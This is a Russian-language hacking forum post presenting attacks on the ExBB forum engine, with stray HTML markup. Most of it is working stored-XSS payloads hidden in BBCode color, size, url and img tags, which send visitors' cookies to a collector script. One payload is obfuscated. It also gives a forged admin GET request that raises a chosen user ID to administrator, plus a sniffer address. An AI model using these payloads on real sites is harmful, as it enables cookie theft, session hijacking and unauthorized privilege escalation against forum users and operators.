Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&amp;checkaction=ye s&amp;userid=3&amp;membertitle=&amp;emailaddress=l ol@lol.ru&amp;newname=lol&amp;password=&amp;homepa ge=&amp;aolname=&amp;icqnumber=&amp;location=&amp; interests=&amp;signature=&amp;numberofposts=0&amp; avatar=noavatar.gif&amp;membercode=ad&amp;submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar